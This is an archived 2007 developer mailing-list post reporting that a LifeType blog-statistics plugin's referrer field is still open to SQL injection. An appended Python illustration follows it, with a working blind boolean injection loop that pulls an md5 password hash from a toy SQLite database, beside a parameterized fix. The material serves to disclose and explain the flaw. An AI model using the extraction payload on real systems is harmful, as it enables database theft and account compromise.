[pLog-svn] r4930 - plugins/branches/lifetype-1.2/unported/blogstatistics

Matt Wood matt at woodzy.com
Fri Mar 2 23:03:06 EST 2007


You almost got it... referrer is still vulnerable to sql injection... I can
effectively recover the entire database with enough time and some
trickiness... or I could just get your hashed password rather quickly...
10sec per char of md5... so ~5min

This probably gives way to other vulns relying on URL validation class if
the data is being inserted into the db.

Check the attached for a semi-PoC. It would take more effort to develop a
real PoC... and I'd have to install the plugin :), although it could be a fun
exercise in some python coding.

-Matt

On 3/2/07, Jon Daley <plogworld at jon.limedaley.com> wrote:
>
>         Yes, it is.  And actually it is appropriately labelled. I fixed it
> up some - not sure if I completed all validation.
>
> On Fri, 2 Mar 2007, Matt Wood wrote:
> > InjectSQL eh? That's a scary function name, threw off my gmail labeling
> > scheme ;)
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://limedaley.com/mailman/listinfo/plog-svn
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: tmp.php
Type: application/x-php
Size: 1334 bytes
Desc: not available
Url : http://limedaley.com/pipermail/plog-svn/attachments/20070302/6d7f3581/attachment.bin 
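As an added illustration of the attack Matt describes (this is not code from the original message, from the attached tmp.php, or from the LifeType plugin): a constructed in-memory SQLite database with a referrer-lookup query that splices the referrer string into the SQL, the same lookup with a bound parameter, and a character-by-character loop that recovers an md5 password hash through the resulting boolean oracle. It uses a true/false answer (did the lookup match a row) rather than the timing channel Matt mentions; the table and column names, the `id = 1` admin row, and the password "secret" are assumptions made up for the example.

```python
import hashlib
import sqlite3

# Constructed sample data (assumed schema, not the plugin's): one admin user
# whose password is stored as an unsalted md5 hex digest, plus one referrer row.
PASSWORD_HASH = hashlib.md5(b"secret").hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (PASSWORD_HASH,))
    conn.execute("CREATE TABLE referrers (id INTEGER, url TEXT, hits INTEGER)")
    conn.execute("INSERT INTO referrers VALUES (1, 'http://example.com/', 1)")
    return conn


def referrer_known_vulnerable(conn, referrer):
    """Vulnerable lookup: the HTTP Referer value is spliced into the SQL text."""
    sql = "SELECT COUNT(*) FROM referrers WHERE url = '" + referrer + "'"
    return conn.execute(sql).fetchone()[0] > 0


def referrer_known_fixed(conn, referrer):
    """Hardened lookup: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT COUNT(*) FROM referrers WHERE url = ?"
    return conn.execute(sql, (referrer,)).fetchone()[0] > 0


def extract_hash(oracle, length=32):
    """Recover an md5 hex digest one character at a time.

    `oracle(referrer)` must return True when the lookup matched at least one
    row. Injecting `' OR substr(...) = 'x` turns the row count into a yes/no
    answer about one character of the stored hash. At most 16 guesses per
    position, so at most 512 requests for a 32-character digest; at the
    ~10 s per character Matt quotes for a timing channel that is a few
    minutes of work. Returns None if no candidate matches at some position,
    i.e. the oracle is not leaking, so the parameterized query yields nothing.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            # The query's own closing quote terminates the injected string.
            payload = ("' OR substr((SELECT password FROM users WHERE id = 1), "
                       f"{pos}, 1) = '{ch}")
            if oracle(payload):
                recovered += ch
                break
        else:
            return None
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", extract_hash(lambda r: referrer_known_vulnerable(conn, r)))
    print("fixed:     ", extract_hash(lambda r: referrer_known_fixed(conn, r)))
```

Against the interpolated query the loop returns the full digest; against the bound-parameter version every payload is compared literally as a URL, no row ever matches, and the loop gives up at the first position. Any URL-validation class sitting in front of the query does not change this unless it rejects the quote character, which is why the fix belongs in the query itself.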